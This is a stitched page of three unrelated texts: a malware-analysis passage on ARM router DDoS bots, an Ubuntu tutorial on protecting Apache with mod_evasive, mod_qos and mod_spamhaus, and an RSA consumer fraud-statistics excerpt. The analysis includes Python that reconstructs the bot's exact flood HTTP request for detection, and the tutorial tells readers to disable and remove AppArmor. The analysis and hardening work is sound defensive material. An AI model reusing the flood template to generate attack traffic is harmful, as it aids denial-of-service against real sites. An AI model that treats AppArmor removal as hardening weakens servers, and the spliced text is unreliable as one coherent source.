.text:0x0A674  LDR  R1 <-- "GET "               ; the request line is written at the start of the buffer
.text:0x0A678  MOV  R2, #4
.text:0x0A67C  MOV  R0, R8
.text:0x0A680  BL   sub_0x0252B8
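
The routine above is a fixed template, so the request it emits can be rebuilt byte for byte and used as a matching rule. The following Python is an added example written for this page, not code from the post: it pairs each header fragment with the memcpy length immediate from the disassembly and checks that they agree, reassembles the request the way the routine does, and matches a raw request against the resulting profile. The second, browser-shaped request used for comparison is constructed. Header order alone is not a signature, since the order here imitates Internet Explorer; the rule only fires when the fixed values match as well.

```python
# Header fragments copied by the flood routine, paired with the MOV R2 immediate
# (the memcpy length) that the disassembly uses for each one.
FRAGMENTS = [
    (" HTTP/1.1\r\n", 0x0B),
    ("Accept: text/html, application/xhtml+xml, */*\r\n", 0x2F),
    ("Accept-Language: zh-CN\r\n", 0x18),
    ("User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)\r\n", 0x55),
    ("Accept-Encoding: gzip, deflate\r\n", 0x20),
    ("Host: ", 0x06),
    ("\r\nConnection: Keep-Alive\r\n", 0x1A),
    ("Pragma: no-cache\r\n\r\n", 0x14),
]
HOST_OFFSET = 0xCD    # ADD R5, R5, #0xCD: bytes between the path and the host name
TRAILER_LEN = 0x2E    # ADD R2, R5, #0x2E: bytes appended after the host name before send()


def length_mismatches():
    """Fragments whose real byte length differs from the immediate in the code (expect none)."""
    return [(s, n, len(s.encode())) for s, n in FRAGMENTS if len(s.encode()) != n]


def build_request(host, path="/"):
    """Reassemble the request exactly as the routine does: "GET " + path, then the
    fixed block, with the target host spliced in after "Host: "."""
    out = ["GET " + path]
    for fragment, _ in FRAGMENTS:
        out.append(fragment)
        if fragment == "Host: ":
            out.append(host)
    return "".join(out)


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, ordered header names, headers dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method = request_line.split(" ", 1)[0]
    names, headers = [], {}
    for line in header_lines:
        name, _, value = line.partition(":")
        names.append(name.strip())
        headers[name.strip()] = value.strip()
    return method, names, headers


# What the binary emits, in order.
FLOOD_HEADER_ORDER = ["Accept", "Accept-Language", "User-Agent", "Accept-Encoding",
                      "Host", "Connection", "Pragma"]


def matches_flood_profile(raw):
    """True when a request has exactly the header set, order and fixed values this sample sends."""
    method, names, headers = parse_request(raw)
    return (method == "GET" and names == FLOOD_HEADER_ORDER
            and headers["Accept-Language"] == "zh-CN"
            and headers["User-Agent"].startswith("Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1;")
            and headers["Connection"] == "Keep-Alive"
            and headers["Pragma"] == "no-cache")


# A constructed request in a different, browser-typical shape, for comparison.
OTHER_REQUEST = ("GET / HTTP/1.1\r\nHost: www.example.com\r\n"
                 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\r\n"
                 "Accept: text/html\r\nAccept-Language: en-US\r\nConnection: keep-alive\r\n\r\n")

if __name__ == "__main__":
    req = build_request("www.example.com", "/index.php")
    print(req)
    print("length mismatches:", length_mismatches())
    print("flood profile:", matches_flood_profile(req), matches_flood_profile(OTHER_REQUEST))
```

The total length the code hands to send(), path length plus 0xCD plus the host name plus 0x2E, equals the sum of all eight immediates plus the request line, which is a cheap way to confirm that no fragment was missed when reading the disassembly.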

Detection ratio & sample

The detection ratio is very low, like..ZERO. Here's the evidence:

The VirusTotal’s link is here–>[LINK]

This post is a proof of concept that routers are targeted by malware actors for many reasons, and one of the main reasons is that they are widely used all over the internet and have global IP addresses. For the crooks behind this, owning many routers means having an "army of DoS bots" that can be a powerful tool for an attack. We saw not only the ARM architecture; MIPS, MIPSEL and SuperH binaries have also been spotted in the wild.

I am adding this project's samples to Kernel Mode; this is the link–>[HERE]

Conclusion & additional notes

It is up to you to defend your own router. As you can see, no AV detects this malware, and it has been out there for over a week now. Please check your router's user interface, make sure you are running the latest firmware/updates, and make sure your settings are correct and unchanged. Being sceptical when checking your router/gateway layer is highly recommended, and if you find anything unusual or suspicious, please analyse WHY and don't let it go until you have a satisfactory answer. If you find it works and has no problems, back up the settings and save them right away.

The Intel x32 edition of this variant was just spotted; the analysis is here–>[LINK] <<– where you can see more details on source, compatibility, compilation etc.

The router version of the ELF DDoS + backdoor malware has also been spotted on the MIPS architecture; the analyses are here–>[HERE] and here–>[HERE]. The older version of the ARM ELF DDoS'er malware that was spotted is also available here–>[HERE].
The tweet below is the PoC that even the PPC architecture is now targeted by DDoS'er malware too (a different actor, using "Tsunami" malware).

This is a warning, backed by evidence, that the recent ELF malware coders are no longer only aiming at x32 or x64 servers, but at routers too.

Why are SOHO routers targeted for malware infection?

The excellent research conducted by ISE (an independent security firm in Baltimore, Maryland), published here–[LINK], explains that they:
"..discovered critical security vulnerabilities in numerous small office/home office (SOHO) routers and wireless access points. These vulnerabilities allow a remote attacker to take full control of the router's configuration settings; some allow a local attacker to bypass authentication directly and take control."

As an illustration, ISE shows a matrix of vulnerability vectors for the evaluated routers:

This shows us that there is a weak security layer being targeted at the SOHO router level, and most homes and SOHO businesses are connected to the internet through these xDSL routers. We cannot underestimate the current volume of these routers that are up and alive on the internet. Maybe only a low percentage of the live routers have the vulnerabilities mentioned, but please imagine how powerful a DDoS attack would be if a bad actor successfully gained control of, say, 1% of all live xDSL SOHO routers. And please think about what happens if your home or office router unknowingly participates in a DDoS or other attack against a certain bank or a specific country.

China ELF CNC & Web Panels Takedown

Among the attackers we have detected so far, China's bad actors are the most aggressive. If the bad actors in China think that MMD won't do anything about their evil actions, they can start to cry now: we have tango'ed 29 ELF malware download panels (up from 25, and the count is still rolling), as announced below:

CREDIT:  #MalwareMustDie

Protect Apache web-server from application DoS attacks (Ubuntu)

This tutorial assumes that you have a running Ubuntu Server, that networking has been set up, and that you have ssh access.

Apache2 is the default web server used by many Linux installations. It is not the only one available, or the best for all circumstances, but it covers many usage scenarios. During the installation you may be asked which web server to reconfigure automatically; answer 'apache2'.

Install Apache2

Use the following command to install Apache2 and other libraries.

$ sudo apt-get -y install apache2 apache2.2-common apache2-doc apache2-mpm-prefork apache2-utils libexpat1 ssl-cert libapache2-mod-php5 php5 php5-common php5-gd php5-cli php5-cgi libapache2-mod-fcgid apache2-suexec php-pear php-auth php5-mcrypt mcrypt libapache2-mod-suphp libopenssl-ruby libapache2-mod-ruby

Update Timezone and Check Correct Time

To reduce confusion with shared or mirrored data, all servers ought to run as closely in sync as possible. Some cryptographic key management systems require accurate time. Lastly, for corporate servers, Sarbanes-Oxley and the HIPAA Security Rule require accurate timestamping.

$ sudo apt-get -y install openntpd tzdata
$ sudo dpkg-reconfigure tzdata
$ sudo service openntpd restart

Disable AppArmor Conflicts

While AppArmor is a suite that does provide an additional layer of security, in my opinion custom profiles need to be created for each system, and that is not covered in this tutorial. So for now we are going to disable it to prevent conflicts with any default configurations.

$ sudo /etc/init.d/apparmor stop
$ sudo update-rc.d -f apparmor remove
$ sudo apt-get remove apparmor apparmor-utils

Note: disabling AppArmor is not recommended for a production web server. For those wanting to create a custom AppArmor profile, refer to the official documentation.

Stop DDoS Attacks

A DDoS attack is a distributed denial-of-service attack. mod_evasive is an Apache module that counts requests per client IP and answers 403 to clients that exceed the thresholds configured below. It is effective against single sources and small application-layer floods, but it cannot absorb a volumetric DDoS that saturates the link; that has to be filtered upstream.

$ sudo apt-get -y install libapache2-mod-evasive
$ sudo mkdir -p /var/log/apache2/evasive
$ sudo chown -R www-data:root /var/log/apache2/evasive

Append the following to the bottom of mod-evasive.load. Apache does not accept a trailing comment after a directive on the same line (the text after # is read as extra arguments and the server refuses to start), so the comments below are kept on their own lines:

$ sudo nano /etc/apache2/mods-available/mod-evasive.load

DOSHashTableSize 2048
# maximum number of requests for the same page within DOSPageInterval
DOSPageCount 20
# total number of requests for any object by the same client IP on the same listener within DOSSiteInterval
DOSSiteCount 300
# interval (seconds) for the page count threshold
DOSPageInterval 1.0
# interval (seconds) for the site count threshold
DOSSiteInterval 1.0
# time (seconds) that a client IP will be blocked for; the timer restarts on every further request from that IP
DOSBlockingPeriod 10.0
DOSLogDir "/var/log/apache2/evasive"
DOSEmailNotify admin@domain.com
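
To see how the three thresholds interact before trusting them on a production host, here is an added Python model of the documented mod_evasive behaviour (this is an example written for this page, not the module's code, and it simplifies the module's hash-table bookkeeping). The traffic it replays is constructed: one client requesting the same page 25 times in 25 ms with the settings above, then retrying, beside a client browsing normally.

```python
class EvasiveModel:
    """Simplified model of the mod_evasive directives above (not the module's code):
    - a per-(client, URI) counter that restarts when the gap since the previous hit
      exceeds DOSPageInterval and blocks the client once it reaches DOSPageCount;
    - a per-client counter doing the same with DOSSiteCount / DOSSiteInterval;
    - a blocked client stays blocked for DOSBlockingPeriod after its *latest* attempt,
      so a client that keeps hammering is never released."""

    def __init__(self, page_count=20, site_count=300, page_interval=1.0,
                 site_interval=1.0, blocking_period=10.0):
        self.page_count, self.page_interval = page_count, page_interval
        self.site_count, self.site_interval = site_count, site_interval
        self.blocking_period = blocking_period
        self.page_hits = {}    # (ip, uri) -> (count, last_seen)
        self.site_hits = {}    # ip -> (count, last_seen)
        self.blocked = {}      # ip -> time of the last attempt while blocked

    @staticmethod
    def _bump(table, key, now, interval):
        count, last = table.get(key, (0, None))
        count = count + 1 if last is not None and now - last <= interval else 1
        table[key] = (count, now)
        return count

    def request(self, ip, uri, now):
        """Return True if the request is served, False if mod_evasive would answer 403."""
        if ip in self.blocked:
            if now - self.blocked[ip] < self.blocking_period:
                self.blocked[ip] = now          # the timer restarts on every hit
                return False
            del self.blocked[ip]
        page = self._bump(self.page_hits, (ip, uri), now, self.page_interval)
        site = self._bump(self.site_hits, ip, now, self.site_interval)
        if page >= self.page_count or site >= self.site_count:
            self.blocked[ip] = now
            return False
        return True


def replay(model, requests):
    """requests: iterable of (time, ip, uri). Returns (served, blocked) counts."""
    served = blocked = 0
    for now, ip, uri in requests:
        if model.request(ip, uri, now):
            served += 1
        else:
            blocked += 1
    return served, blocked


# Constructed traffic. One client hits the same page 25 times in 25 ms, tries again
# 5 s later, then once more 10.5 s after that; a second client browses normally.
FLOOD = [(i * 0.001, "203.0.113.7", "/index.php") for i in range(25)]
RETRY_5S = [(5.0, "203.0.113.7", "/index.php")]
RETRY_LATER = [(15.5, "203.0.113.7", "/index.php")]
NORMAL = [(0.5 + i * 0.3, "198.51.100.2", "/page%d" % i) for i in range(10)]

if __name__ == "__main__":
    m = EvasiveModel()
    print("flood        served/blocked:", replay(m, FLOOD))          # (19, 6)
    print("retry +5s    served/blocked:", replay(m, RETRY_5S))       # (0, 1): still inside the period
    print("retry +15.5s served/blocked:", replay(m, RETRY_LATER))    # (1, 0): released
    print("normal       served/blocked:", replay(EvasiveModel(), NORMAL))  # (10, 0)
```

Two things the replay makes visible: the blocking period is measured from the client's last attempt, not its first, so a bot that retries every few seconds is blocked indefinitely; and a client behind a large NAT can trip DOSSiteCount with perfectly legitimate traffic, which is why the site threshold is set an order of magnitude above the page threshold.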

Stop Slowloris Attacks

An Apache module also exists for Slowloris attacks, though which module depends on the version of Ubuntu you are using. For Ubuntu 12.10 or later:

$ sudo apt-get -y install libapache2-mod-qos

Then check configuration in qos.conf:

$ sudo nano /etc/apache2/mods-available/qos.conf
## QoS Settings
<IfModule mod_qos.c>
    # handles connections from up to 100000 different IPs
    QS_ClientEntries 100000
    # will allow only 50 connections per IP
    QS_SrvMaxConnPerIP 50
    # maximum number of active TCP connections is limited to 256
    MaxClients              256 
    # disables keep-alive when 70% of the TCP connections are occupied:
    QS_SrvMaxConnClose      180
    # minimum request/response speed (deny slow clients blocking the server,     
    # ie. slowloris keeping connections open without requesting anything):
    QS_SrvMinDataRate       150 1200
    # and limit request header and body (careful, that limits uploads and
    # POST requests too):
    # LimitRequestFields      30
    # QS_LimitRequestBody     102400
</IfModule>

Note: If you are running a version of Ubuntu prior to 12.10, use the following instead.

$ sudo apt-get -y install libapache2-mod-antiloris

Check config in antiloris.conf.

$ sudo nano /etc/apache2/mods-available/antiloris.conf
<IfModule mod_antiloris.c>
	# Maximum simultaneous connections in READ state per IP address 
	IPReadLimit 5 
</IfModule>

Block Known-Bad Clients with a DNSBL

mod_spamhaus is a module that checks the client IP against DNS blocklists (DNSBL) in order to block spam relay via web forms, prevent URL injection, block HTTP DDoS attacks from listed bots and generally protect the server from known-bad IP addresses. Only the request methods listed in MS_METHODS are checked, so with the configuration below plain GET requests are not filtered.

$ sudo apt-get -y install libapache2-mod-spamhaus
$ sudo touch /etc/spamhaus.wl

Append the config to apache2.conf

$ sudo nano /etc/apache2/apache2.conf
<IfModule mod_spamhaus.c>
  MS_METHODS POST,PUT,OPTIONS,CONNECT 
  MS_WhiteList /etc/spamhaus.wl 
  MS_CacheSize 256 
</IfModule>

Restart Apache to load new modules.

$ sudo service apache2 restart

Now the web server has been installed and is up and running. Point your web browser at your domain for the default page that confirms it is working. As a final check, run the following to see whether your server logged any error messages; Apache's own errors, including module load failures, are written to /var/log/apache2/error.log. If there are errors, look them up and address them now.

$ sudo tail -200 /var/log/syslog


CYBER SECURITY AWARENESS: HOW ONLINE BEHAVIOR PUTS CONSUMERS AT RISK

October 2013 – rsa-fraud-report-102013

October marks the launch of National Cyber Security Awareness Month in the United States, a time for the public and private sectors to come together to promote awareness about how to stay safe online. Last year, RSA launched the Online Identity Risk Calculator in conjunction with the National Cyber Security Alliance (NCSA) to provide an interactive tool for consumers to see how the activities they perform online could put them at risk for identity theft and other cyber threats.

In the last year, we have received over 14,500 responses from consumers in more than 170 countries. Following are some of the highlights:

- 67% of consumers access their online banking account at least once a week
- 83% of consumers make a purchase online once a month or more often
- 95% of consumers access one email account on a regular basis
  - 40% access three or more email accounts on a regular basis
- 77% of consumers access social networking sites on a regular basis
- 74% of consumers have downloaded apps to a mobile device within the last year
- 37% of consumers visit online gaming sites once a month or more often
- 35% of consumers have been infected with a Trojan in the last year

So why are these statistics so important? Take for example that 3 out of every 10 phishing emails are targeted at social networking sites. When you consider that more than three out of every four consumers use a social networking site on a regular basis, it makes the net that phishers are able to cast much wider.
